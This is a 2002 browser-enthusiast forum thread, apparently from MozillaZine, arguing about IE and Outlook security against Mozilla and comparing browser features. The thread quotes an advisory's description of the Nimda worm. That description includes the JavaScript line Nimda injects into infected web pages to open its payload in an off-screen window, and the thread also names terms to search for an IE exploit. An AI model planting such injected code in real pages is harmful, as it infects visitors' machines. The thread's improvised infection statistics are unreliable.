"... Note that any x86 email software that uses a vulnerable version of Internet Explorer to display HTML messages [1] will automatically execute the malicious attachment if the message is merely opened or previewed [4]. This happens because the worm MIME encodes the attachment to take advantage of a known vulnerability called "Automatic Execution of Embedded MIME Types" (see CERT advisory CA-2001-06 [1]). Microsoft's Outlook and Outlook Express are the most typical victims. Every ten days the worm regenerates its list of email addresses and sends itself to all....If a vulnerable version of Internet Explorer is used to view or preview the message, the malicious attachment will be executed without the user's knowledge. Unpatched IE 5.01 and IE 5.5 without SP2 are vulnerable. Further, IE 6 can be vulnerable under specific conditions. See the PROTECT section for further information. Mail clients that are not using vulnerable versions of IE can also facilitate infection, but in those cases the user must double-click the attachment to execute the virus....Once Nimda has infected a system, it searches the local hard drives for .HTML, .ASP, and .HTM files [3]. The worm also looks for files with INDEX, MAIN, or DEFAULT in the name [4]. If any such files are found, the worm creates a multi-part MIME-encoded copy of itself named README.EML in the same directory. Further, the worm adds a small piece of JavaScript to each one of the found files. The JavaScript, shown below, contains instructions to open a new browser window and download README.EML to the client. As described in the section regarding email propagation, if the client happens to be a vulnerable IE browser, the malicious program will be automatically executed and the machine viewing the web page will become infected. <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> The author of Nimda cleverly chose to write the JavaScript such that the new browser window will be opened outside the viewable desktop area so that the user may not even notice it. Browsers other than IE may force the window into the viewable area, and will not automatically execute README.EML." <http://216.239.35.100/sea…es&hl=en&ie=UTF-8>

NIMDA, one of the costliest and most widespread worms in the history of MS Windows computing (more than 1.2 million infections in the first couple weeks it existed with as many as 120,000 infections in a single day <http://zdnet.com.com/2100-1105-273420.html-> that sounds considerably more widespread than the 42 thousand fatality car wrecks in all of that year), didn't require any user execution. If you got it you probably got it by simply opening an email message or browsing a web page. That Microsoft offered patches to IE/Outlook to defend against this massive attack is an admission of inadequate security in their vulnerable applications. I didn't get infected by NIMDA while a good portion of my friends and family did. I attribute that to not using applications with inadequate security. Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't. All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application.

--Asa

#91 Re: Re: Not my exp

by kristen

Monday July 8th, 2002 6:41 PM

Reply to this message

"How then did your system get infected?"

Well, to sum it up (from what I can remember): One time a virus was included with a new computer that was purchased via mail order several years ago from a company called 'Strobe Computers'. Another time I got one via a floppy disk from work that was later traced back to the bosses son (where he got it I don't know). Another time, via email, I got an attachment from a friend called 'fireworks.exe' (or something like that) that I ran without scanning first shame on me). Another time I did receive the Iloveyou but I was aware of what it was so I didn't execute it, of course. There have been a few instances also where I have downloaded cracks (shame on me) that contained a virus of one type or another (I never actually got infected by it though). The worse kind of thing that I have come across, again from the crackers world, and again, shame on me, isn't even a virus. It's a program that does what it is supposed to do, and a little extra on the side. Something that av utilities cannot detect. I ran across one that removed the association for 'exe' types which proved to be a major nuisance and took me a while to figure out what was wrong.

"Did you or anyone you know get NIMDA?"

No. Melissa, Iloveyou, yes. Case in point, though, I have never ever heard of any widespread disaster as the result of web browsing.

"Do you have confidence that there are not going to be additional attacks on MS products of this scale or larger? I don't."

I can't really speculate on that with the exception that the most widely used of anything will be the most subject to attack.

"All of the major anti-virus software packages defend against NIMDA. I'm of the opinion, however, that a user shouldn't have to pay extra money and install extra software because of an inadequate email or web browsing application."

Are you suggesting then that if people were to switch to Mozilla that they no longer need anti-virus software, firewalls, etc.?

#97 Re: Re: Re: Not my exp

by asa <asa@mozilla.org>

Monday July 8th, 2002 10:12 PM

Reply to this message

"Are you suggesting then that if people were to switch to Mozilla that they no longer need anti-virus software, firewalls, etc.?"

Depends. I have no say in the firewall issue at work. We have an industrial strenght firewall there that is supposed to prevent people on the outside getting inside. They also "require" that we use antivirus software on all our machines (I currently have 7 machines, three of them PCs running windows or linux, three of them macs running 8,9,and X and one of them an OEOne machine running OEOne's HomeBase). I download and install the company recommended antivirus apps about once every 6 months on my windows and macintosh machines, run them, and find nothing. I attribute this to avoiding the virus, worm and other attacks aimed at the less secure Outlook and IE (although I do have to use IE for testing some of the time and I'm always a little bit apprehensive). At home I don't have a firewall but I'd like to get one because I occasionally run other networked apps that I'm not as confident about. But the overwhelming majority of my internet activity is using Mozilla and so I feel pretty confortable that my system is secure. If a bug report about a security issue in Mozilla shows up and it worries me then I take the necessary precautions. Sometimes that means disabling JavaScript or some particular JS functionality (mozilla has more granular controls on JS than IE so this is less painful than it would be if I was using IE) or it might mean waiting a day or two before a patch is available and during that time I might not surf from home where I don't have the protection of an industrial strenght firewall. That hasn't happened yet although I did stop using IE completely for a couple of weeks (while I waited on a patch from MS) after the announcement of one of the exploits this spring. I haven't been infected by a single virus or worm or been the victim of any security attack in over 2 years. The last time I was a victim was at my old job where we were standardized on Outlook and IE and during that time I had several virus infections an ad-ware app secretly installed by a malicious website (it kept popping up IE windows with random ads). And I had an app that IS said was a virus-installed backdoor that could allow a malicious website to read data off of my harddrive or other drives on our intranet. I have no idea whether or not my files were actually read though and IS was unable to tell from the firewall logs so they assumed that it didn't happen.

I believe that Outlook is probably the biggest security problem on the internet these days (both for corporations and individuals) Unfortunately that reflects poorly on IE and the Windows operating system because so many of the worm and virus attacks are actually exploiting holes in IE or other OS components that Outlook uses. As a matter of fact, the latest MS security patch for the hole in Windows Media Player was actually a patch to a vulnerable part of the IE cache that could be taken advantage of through WMP or other web-enabled apps that used that part of the IE cache.

I just don't trust those apps. I have very little in the way of files on my machine that would bother me if they got stolen so I'm not terribly worried about that but I would be in sorry shape if something corrupted or deleted some of my files. I'm sure that other people have lots of private information on their machines and MS has a poor track record when it comes to protecting user data. I recommend to people using apps with bad records on security that they find applications with better track records. Netscape and other Mozilla-based applications are a good choice as IE and especially Outlook replacements.

--Asa

#117 NIMDA vs Fatal Car Wreck

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 1:48 AM

Reply to this message

>NIMDA, one of the costliest and most widespread worms in the history >of MS Windows computing (more than 1.2 million infections in the first >couple weeks it existed with as many as 120,000 infections in a single >day <http://zdnet.com.com/2100-1105-273420.html> that sounds considerably more widespread than >the 42 thousand fatality car wrecks in all of that year), didn't require >any user execution. If you got it you probably got it by simply opening >an email message or browsing a web page.

I can find no documented statistics indicating the breakdown of the methods by which NIMDA was spread, but I do know that at least 24% of the individual NIMDA infections that I have encountered were not accomplished via email; some instances were where the users were using Lotus Notes as their email client and other instances occurred in an environment where the mail server was equipped with antivirus software that filtered out all NIMDA infected email before it could reach the user.

Projecting my experience over the stats ZDnet gave in Asa's link yields the following :

24% of 1.2 million = 288,000 NIMDA infections by means other than email

So by this calculation, you would about 6.9 times more likely to get NIMDA via a non-email method than to die in a car wreck.

(Note: the 42,000 represents a whole year whereas the 1.2 million was only accounting for the first few weeks of NIMDA and there were undoubtably additional NIMDA infections during the following 11 months.)

Of course, some of those 288,000 could have been infected via file shares rather than web browsing. Of course, some of the other 76% could have been infected via web browsing.

However, even if the web browsing infections only made up 15% of the 288,000 (equal to 3.6% of the 1.2 million NIMDA infections) then that still would indicate that you were more likely to get NIMDA than die in a car wreck.

Remember now that we are only talking about NIMDA here; if you add in the numbers for other infections such as Klez then the comparison looks even worse for Microsoft.

Kristen, if you can find any factual evidence that indicates that IE was responsible for less than 3.6% of the total incidents of NIMDA and Klez, please provide us with links to that information.

#85 Re: Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my exp

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:11 AM

Reply to this message

> Did any of this occur via viewing a web page or simply > opening an email? No. Back at you: "If your answer to > these questions is yes then you're in the extreme minority." ;)

Your "Back at you" is just plain wrong. Nimda and Klez are two of the most widespread infections that we have seen and both are spread by simply viewing a web page or an email. People who encountered these virii/worms are not an extreme minority.

#82 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 9:56 PM

Reply to this message

A little addendum here. To make things a bit easier I made a directory called c:\test. In that directory there are two files, one called mozilla.txt and the other called getme.exe.

Via email (<kristen_m@prodigy.net>) or a web page that I should visit tell me the contents of mozilla.txt and/or execute getme.exe

I said my specs earlier but I'll say again, IE6/OE6, WinXP Pro, NTFS, single hard disk partition.

Don't worry about serious damage, the worse that could possibly happen is a reinstall of windows and the mozilla user base increasing by 1. ;)

#86 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experie

by SubtleRebel <mark@ky.net>

Monday July 8th, 2002 8:14 AM

Reply to this message

Are we also to assume that you have followed your own advice and you have not installed any recent MS Security patches?

#88 Re: tuxracer's comparison

by tuxracer

Monday July 8th, 2002 11:21 AM

Reply to this message

Again, things like <http://www.malware.com/lookout.html> put you at the mercy of every e-mail you choose to read or website you choose to visit. It is possible that you will never get exploited, it is possible that you will and lose everything on your computer, etc...

Just like the car accident analogy. It is possible that you will never get in a car accident. However, people put on their setbelts because just in case they /do/ get in a car accident their chances of dieing are cut in half.

Say you own a house in the inner city. You could leave your doors and windows unlocked and it is possible that you will never be robbed. But with your doors and windows unlocked, anyone could just walk right in, you are at the mercy of the neiberhood. Most people don't like to be in that type of possition so they choose to lock their doors.

Just like you could use a browser and e-mail client which has a known 18 different ways of getting in, and one very dangerious way in particular <http://www.malware.com/lookout.html> IE/OE are like houses in the inner city with unlocked doors. It is possible that you wont get broken into, but you are at the mercy of your neighborhood (in this case a few billion people online - Every e-mail you choose to read or website you visit). I live in the inner city, and I lock my doors. It is possible that I may never get broken into, but I would rather not leave my house wide open just in case someone decides too try breaking in. I use Mozilla. It is possible that I could use IE/OE and never get exploited, but I would rather not use programs that are so vulnerable to exploit <http://jscript.dk/unpatched/> just in case someone tries. Again, that's just me.

#39 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 9:58 AM

Reply to this message

The point is that you are at the mercy of every e-mail and every website you visit. You might not, I'll even say you probably will not, get exploited by someone taking advantage of the many wholes (18 atm) in IE. However, like I said, you are at the mercy of every website you visit, and every e-mail you choose to read (if you're using any form of Outlook to read it, this includes Outlook Express, Outlook 2002, Outlook XP, etc... I need to make that clear because people tend to argue with me about it if I don't, they don't seem to realize that Outlook means all versions). And I don't know about you, but that simple is not a position I want to be in. But that's just mean, each to their own I guess.

#16 Obviously biased list

by bk_raze

Thursday July 4th, 2002 7:28 PM

Reply to this message

Tux, your list is obviously biased towards Mozilla 1.0. While I can't comment on Netcaptor or IE 5.5 for Mac, you left out many features that IE 6.0 has that Mozilla 1.0 does not have. It is clear to me that you carefully constructed this list to make Mozilla look so much better than IE 6.0 at first glance. I am sure that was your agenda, which is fine. However, if you are trying to construct an objective list, this is far from it.

#17 Re: tuxracer's comparison

by tuxracer

Friday July 5th, 2002 1:39 AM

Reply to this message

"Tux, your list is obviously biased towards Mozilla 1.0...you left out many features that IE 6.0 has that Mozilla 1.0 does not have."

Really? Like what? It's pretty easy to say "It's bias", but please, point out specific things that I have missed.

#25 Re: Re: tuxracer's comparison

by bk_raze

Friday July 5th, 2002 6:42 PM

Reply to this message

"Really? Like what?"

Tux, you probably don't use IE regularly enough to know. For me, I use IE regularly, and I can tell you that there are some features I find apparently missing in Mozilla 1.0 that IE has:

1. Ability to move the toolbars by simply dragging them and moving them (even combine 2 side by side). 2. Ability selectively show and rearrange toolbar buttons. 3. Ability to show buttons as text with images, selective text, or just as pictures (4.x had this). 4. Ability to right click favorites (bookmarks) and perform operations (rename, delete) on them. 5. Ability to drag favorites (bookmarks) from the menu and move them around or into folders. 6. Automatic image resizing and image toolbar. 7. When working offline, pointer shows you whether a link can be viewed or not. 8. Ctrl+Enter allows you to type "yahoo" and it will add http://www. and .com for you. 9. Autocomplete for individual form fields. 10. Ability to search history by complete text.

Also, you should categorize your list as to separate usability features from compliance issues. Compliance issues are bugs. A non-bug is not a feature.

So for example, lack of support for CSS background-attachment:fixed is an IE bug, not a Mozilla feature. (Nobody would file a bug in bugzilla titled "Support for background-attachment:fixed" as an RFE--if mozilla didn't support it, it would be entered as a bug.) Meaning a browser (Mozilla or other) should be compliant--if not, it has compliance issues or bugs.

Hope this helps you.

#59 Re: Re: Re: tuxracer's comparison

by jsebrech

Sunday July 7th, 2002 8:08 AM

Reply to this message

1. True. I miss this in mozilla.

2. You can hide anything on the toolbar with some userchrome, you can't rearrange it though. And editing textfiles to do stuff sucks. But the most popular things that people want to hide have gui options anyway, so it doesn't matter THAT much.

3. You can hide the text in mozilla mail and composer with some userchrome, again. No gui, again. Official position is that if people want this they should modify a theme to do this. I don't exactly agree with official position though.

4. I don't get this. Right-click where? In mozilla 1.0, I can right-click in the sidebar and get that menu, and I can right-click in the bookmarks dialog and get that menu. Are you talking about right-clicking an entry in a menu? Because that would be so wrong from a UI designer's point of view.

5. True. But you can do it in the sidebar (press F9 for immediate access, really fast), and you can do it in the bookmarks dialog, ofcourse. I have to admit I'd like it in the menu's too, though, for consistancy's sake.

6. Ah, yes, that's handy. The only IE feature I think is really cool. Mozilla should have that.

7. You know, I never even knew about this. Just like the mozilla developers I use broadband, meaning I never disconnect. Point taken. Though it's easy to see whether a link is local or not by looking in the statusbar and seeing if the link starts with anything other than file://.

8. ? Uh huh. I see. Well. It's a feature. I suppose. Who thinks of this stuff? This is what location bar autocompletion is for.

9. Yeah, form autocompletion needs work in mozilla. I think there are plenty of bugs outstanding on it. I'm not the right guy to comment on it though. Anyway, it'll get fixed.

10. OK, handy. Maybe i'd use it. But then I never use history anyway. Google is my friend.

Anyway, if that's what IE has to offer, then I think mozilla has the better deal. Surely there must be more?

#66 Re: Re: Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 11:31 AM

Reply to this message

Jsebrech, I welcome your reply, but my original goal was to help tux create a more objective list (if he wanted to listen) since he doesn't use IE regularly. Obviously, some of these features may not matter much to you. On the same note, there are features that only Mozilla has that don't mean much to me (you mentioned one--userchrome). I was glad to see that overall, you welcomed my list. The features I mentioned are ones that I personally make use of, some of them extensively.

I noticed you had some questions, which I will answer for you: 4. Right click favorites (bookmarks). "Are you talking about right-clicking an entry in a menu?" Yes, I did mean right-click from the menu. You see, in Mozilla, there are 2 ways to access bookmarks--menu or sidebar. I am a user that prefers to use the menu. However, I get hurt for this--users that prefer the menu don't get the luxury of right clicking a bookmark as the people that prefer the sidebar do. (Whether that would be poor UI design is another issue).

8. Ctrl+Enter adds http://www and .com for you. "Who thinks of this stuff?" I DO! I really make use of this one. To give you an example, if I want to go to ebay, I can type "ebay" and just hold ctrl in addition to hitting enter and I am there. I would be there before I even find it among my favorites! I am surprised that you flat out don't care about this one, but that is personal to you. Maybe you just haven't used it to see its usefulness.

"Surely there must be more?" There are several more reasons I use IE over Mozilla, which I don't think you want to hear. And if I told you them, they wouldn't be on topic--the post I put up was my response to tux's biased feature comparison.

#67 Re: Re: Re: Re: Re: tuxracer's comparison

by jsebrech

Sunday July 7th, 2002 12:10 PM

Reply to this message

Sorry that I butted in :) It's a habit I can't seem to kick.

About right-clicking favourites. I'm sure that there would be a rash of weblog ranting by mpt and various other mozilla developers if anyone dared adding the feature you want. However, I'm also not surprised that there are people who like behaviour like that. My question to you is: do you like it because you've learned to use it, or do you like it because it's good behaviour? Anyway, this is all food for UI designers, and it's way out of my league.

For the ctrl+enter trick, to take your ebay example to mozilla... When I type "ebay.com" it takes me to the ebay website. Entering it once puts it in the autocompletion history. Now, whenever I type "ebay", the browser will add the ".com" for me. I just tested this to make sure this actually works. No ctrl necessary. A plain enter will do. But, ok, suppose you have a website that requires the www in front every time (I don't think autocompletion adds this), due to being misconfigured. If you visit it often, what do you do? You add it as a bookmark, and give it as a keyword whatever shorthand name you want. Short, simple, and again a simple enter will do to visit it, no ctrl necessary. This is why I think the "feature" you mention isn't really useful from the mozilla point of view.

Now, for sites you visit once, this may be a win. But honestly, I can't say I actually do that often. Most people have a fixed number of sites they visit often, and autocompletion and keywords are imho a much better solution for those. (Although for my daily sites bookmark groups serve me best)

#70 Re: Re: Re: Re: Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 1:05 PM

Reply to this message

I can understand that you don't find ctrl+enter that useful. I mean, it's not a "big" feature, actually it is a very subtle one. But I do find it very useful. And yes, it mainly helps the first time you go to a site, but for that time, it does save typing :)

As for right-clicking favorites, yes, that would be a huge topic of debate. Being a user, I enjoy the way it works and it saves a lot of time, and I would never want this functionality taken away. To answer your question: "Do you like it because you've learned to use it, or do you like it because it's good behaviour?"

I am a user, and until you mentioned it, the though of poor UI design never crossed my mind. I've come to expect the functionality of right clicking an object to modify it, even if it is a shortcut in a menu. Just like I do when I want to delete, rename, or change the icon on a shortcut from the Start menu. Maybe it is because I am a Windows user.

I am not a developer, but commenting on design, I think it is good behavior. Traditionally, only commands or options are on a menu, and you shouldn't be able to right-click a command or option. But favorites on a menu is an exception. A favorite is a shortcut to a document. And like any shortcut, I should be able to right-click it to open, delete, rename, or view its properties, change its icon, etc.

#72 but it _is_ there

by niner

Sunday July 7th, 2002 3:57 PM

Reply to this message

Just type in any name and if Mozilla finds it nowhere else it will try <http://www.thenameyoutried.com> even without a ctrl.

#73 Only works if Internet Keywords are disabled

by AlexBishop <alex@mozillazine.org>

Sunday July 7th, 2002 4:52 PM

Reply to this message

"Just type in any name and if Mozilla finds it nowhere else it will try <http://www.thenameyoutried.com> even without a ctrl."

Note that if Internet Keywords are enabled this doesn't work (Edit > Preferences > Navigator > Smart Browsing > Internet Keywords > Enable Internet Keywords).

Alex

#64 Re: Re: Re: tuxracer's comparison

by TheK <kl@3dots.de>

Sunday July 7th, 2002 10:26 AM

Reply to this message

nice list, but..: 8. you need no Ctrl in Mozilla 9. doubleclick

#65 Re: tuxracer's comparison

by tuxracer

Sunday July 7th, 2002 10:49 AM

Reply to this message

1-5. I agree

6. Iffy, kind of an annoyance.

7. Can't comment, never worked offline in either browser.

8. Add 4 more characters and you can get there yourself.

9. There is autocomplete for inidividual form fields.

10. Not sure what you mean.

"Also, you should categorize your list as to separate usability features from compliance issues."

I do plan on doing this eventually, though for a different reason.

"So for example, lack of support for CSS background-attachment:fixed is an IE bug, not a Mozilla feature."

Full CSS1 support /is/ a feature in my book. And each browser either has it or it doesn't. In this case Mozilla and IE on mac have it, and IE on Windows doesn't.

"Meaning a browser (Mozilla or other) should be compliant--if not, it has compliance issues or bugs."

Again, I feel that whether or not a browser has full CSS1 support or not is a feature.

"Hope this helps you."

It has. I will be updating the list with the things you've mentioned soon. Thanks.

#69 Re: Re: tuxracer's comparison

by bk_raze

Sunday July 7th, 2002 12:22 PM

Reply to this message

Tux, you seem to need some help with 6-10:

6. Image toolbar and resizing. "kind of an annoyance." That may be an annoyance to you personally. The fact is that the feature is there, and not putting it up because you don't like it is biased. I make use of these features. They can be turned off anyway.

7. Working offline. "Never worked offline." But some people do work offline. That is why I am mentioning it to you. You may not be aware of some features that other people use. I do work offline.

8. Ctrl+Enter. "Add 4 more characters and you can get there yourself." Again, you are refuting the feature because you don't use it. The fact is that the feature is there, whether you care use it is personal to how you want to browse. I use this feature extensively.

9. Autocomplete for individual form fields. "There is autocomplete for individual form fields." I have seen its implementation in Mozilla. In IE, for each field, you have a dropdown list that shows all previous entries entered in that field. You'd have to see it to understand--it truly is for the individual field. If you want to dismiss this one because it is technically "exists" in Mozilla then I can agree with you.

10. Search history by complete text. "Not sure what you mean." You don't seem to be aware of this feature, but don't dismiss this one. You can search the history for a specific word actual contents of a previously visited page, not just by the title of the page. I use this one too (especially with offline browsing).

Tux, the bottom line is that you shouldn't dismiss that a feature in IE exists because you don't use it. I personally make use of all of these features.

#22 Pause/resume download

by WillyWonka

Friday July 5th, 2002 3:46 PM

Reply to this message

You have on the list that some of the browsers support pause and resume on the downloads, but do any of them support resuming from a disconnection?

eg I get disconnected at 95% and the browser realizes this and picks up where it left off (Similar to peer to peer file sharing programs).

#43 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 10:24 AM

Reply to this message

That's actually interesting. I'm on a cable connection which hardly ever gets me disconnected, and if I do get disconnected it is for long periods of time due to some outage. So I haven't been able to experience this for myself. Anyone care to clue me in on whether or not Mozilla will automatically pause (after it detects the user has been disconnected from the net) and resume (after it detects the user has been reconnected) downloads?

#23 tuxracer: improve your html

by Chris_C

Friday July 5th, 2002 4:34 PM

Reply to this message

tuxracer: on your comparison page <http://tinyurl.com/btw> you have the columns in your table displayed using fixed pixel widths. The resultant table is too large for my 800x600 display.

I tried just reducing the font size (neat-o moz feature!) but the columns remained the same width, which means you're trying to outsmart the browser. Either use proportional widths or don't specify them at all, and let the user's browser do what's best for the user's display.

And if you say "I designed for a bigger display, sorry", then I'm afraid the locals here may rise up and revoke your mozilla evang credentials :)

#38 Re: tuxracer's comparison

by tuxracer

Saturday July 6th, 2002 9:55 AM

Reply to this message

That is because I want the spacing to look a certain way. And I do not want the text to wrap, for the most part, and in certain places it is just so long it needs to wrap to fit on even 1024x768 displays. Do I did the best I could to make it tidy, but that's about as best as I can do without making the font a single point and hard to read for those who have resolutions higher then 800x600, which is most people.

#46 Tuxracer:

by rcmoz

Saturday July 6th, 2002 4:58 PM

Reply to this message

About Sending Params from Keywords (i.e. being able to use "g penguins" to search google.com for the word penguins) -- you say IE can't do this, yet you also say there may be a way to do this in the registry -- which is it?

IE's been able to do this since IE4 when it came bundled with QuickSearch.exe -- all QuickSearch does is modify one bit of the registry:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl\g Set string (Default) = <http://www.google.com/search?q=%s>

That's it! You now have your Google Search.

#47 Massive Mozilla vs. Opera vs. IE6 comparorama

by rcmoz

Saturday July 6th, 2002 5:00 PM

Reply to this message

#60 Re: Massive Mozilla vs. Opera vs. IE6 comparorama

by jsebrech

Sunday July 7th, 2002 8:51 AM

Reply to this message

Sorry, but that comparison is just too old. There are a lot of things in there which aren't correct anymore because mozilla evolves faster than people think. And also, the writer seems to have this impression that other browsers than opera are slower than they in reality are. I've used opera, I use mozilla, on the same machine, a pII/233. Both were usable. Opera was faster, yes, but not that much faster. My guess is the author has a hard drive that dates from the dinosaur era.

#78 sidescrolling is worse than line wraps

by Chris_C

Sunday July 7th, 2002 8:17 PM

Reply to this message

It's your choice to format it so that text does not wrap, but I submit that having to sidescroll back and forth to read each line is much worse than having undesirable line wraps. That is, once I saw your page required annoying sidescrolling to read each line, I bailed and moved on to something else. Which obviously defeats your purpose in setting up the page -- for people to read your results. Like I said, your choice.

#79 Re: sidescrolling is worse than line wraps

by Chris_C

Sunday July 7th, 2002 8:18 PM

Reply to this message

whoops, sorry, that was supposed to be a reply to another post in a thread ..

#52 Sucess !!

by Dobbins

Saturday July 6th, 2002 8:37 PM

Reply to this message

You can tell you have a winner when the microserfs get worried enough to start showing up with an Astroturf campaign.

#58 Attachments

by DJGM2002

Sunday July 7th, 2002 6:06 AM

Reply to this message

"Just like an 'unsavvy' Mozilla user could run attachment called 'iloveyou.exe' that they received from someone they know that could cause all sorts of trouble."

Err, no. If you're referring to receiving attachments in the mail client of Mozilla, even if you doubleclick on an attachment, be it a harmless .txt file, or some dangerous .exe file, you get the choice, via a dialog box, to either save it or open it.

Mozilla's email and news client does NOT open any type of attachments automatically, whatever type of files they are, unlike Microsoft's email clients, Lookout and Lookout Distress, are well known to do.

#71 Name Games

by AlexBishop <alex@mozillazine.org>

Sunday July 7th, 2002 1:50 PM

Reply to this message

> ...unlike Microsoft's email clients, Lookout and Lookout Distress

Personally, I prefer to call them Lookout and Outhouse Distress, but that's just me. :-)

Alex

#151 INTERNET EXPLORER VIRUS

by fooness

Sunday July 14th, 2002 1:27 PM

Reply to this message

While the discussion is interesting, the correct data is missing.

The all-time Internet Explorer 'virus' or exploit is in fact something called:

js.exception

This is / was a problem with MSIE's VM which allows for complete write access to the hard drive.

Merely surfing the web will allow for install or writing to the clients hard drive. There are no shortage of infections continuing today.

It is Internet Explorer 5.5 specific. Which is the version that the vast majroity of MS users have today. It requires nothing other than an unpatched version of 5.5.

Nimda on the other hand while primarily an internet worm had a second vector via the web utilising a combination flaw of IE5.5 and the default Windows Media Player 6 to allow for execution.

Someone can do the math, surfers with a combination of IE5.5 and Windows Media Player 6 happening upon one of one hundred thousand infected MS servers vs. surfers with only IE5.5 happening upon a specially crafted website utilising js.exception.

Nimda today has died down but look at the count.

js.exception is very much still active today.

Run a search on google groups for js.exception.

There is no officially tally yet on it as it is still "active" certainly when all is said and done, there will be some very interesting statistics.

For an idiots view of js.exception:

<http://antivirus.about.co…rary/weekly/aa041602a.htm>

for a more technical understanding search out the following:

com.ms.activeX.ActiveXComponent

Either one will certainly confirm that the automobile accident to web surfer ration can most definitely be close.

Very simply put, Internet Explorer is flawed now and tomorrow. It is a poorly produced piece of software (be design)and can never be fixed properly unless re-written from scratch.

#152 INTERNET EXPLORER VIRUS

by fooness

Sunday July 14th, 2002 1:30 PM

Reply to this message

While the discussion is interesting, the correct data is missing.

The all-time Internet Explorer 'virus' or exploit is in fact something called:

js.exception

This is / was a problem with MSIE's VM which allows for complete write access to the hard drive.

Merely surfing the web will allow for install or writing to the clients hard drive. There are no shortage of infections continuing today.

It is Internet Explorer 5.5 specific. Which is the version that the vast majroity of MS users have today. It requires nothing other than an unpatched version of 5.5.

Nimda on the other hand while primarily an internet worm had a second vector via the web utilising a combination flaw of IE5.5 and the default Windows Media Player 6 to allow for execution.

Someone can do the math, surfers with a combination of IE5.5 and Windows Media Player 6 happening upon one of one hundred thousand infected MS servers vs. surfers with only IE5.5 happening upon a specially crafted website utilising js.exception.

Nimda today has died down but look at the count.

js.exception is very much still active today.

Run a search on google groups for js.exception.

There is no officially tally yet on it as it is still "active" certainly when all is said and done, there will be some very interesting statistics.

For an idiots view of js.exception:

<http://antivirus.about.co…rary/weekly/aa041602a.htm>

for a more technical understanding search out the following:

com.ms.activeX.ActiveXComponent

Either one will certainly confirm that the automobile accident to web surfer ration can most definitely be close.

Very simply put, Internet Explorer is flawed now and tomorrow. It is a poorly produced piece of software (be design)and can never be fixed properly unless re-written from scratch.

#155 Re: INTERNET EXPLORER VIRUS

by kristen

Monday July 15th, 2002 11:36 AM

Reply to this message

"Either one will certainly confirm that the automobile accident to web surfer ration can most definitely be close."

Yes, it could be close, can't say for sure with 100% certainty without more data. ;)

#158 Re: Re: INTERNET EXPLORER VIRUS

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:12 PM

Reply to this message

"Yes, it could be close, can't say for sure with 100% certainty without more data."

Curious change there kristen; how does that fit in with you claims of "several times over" ??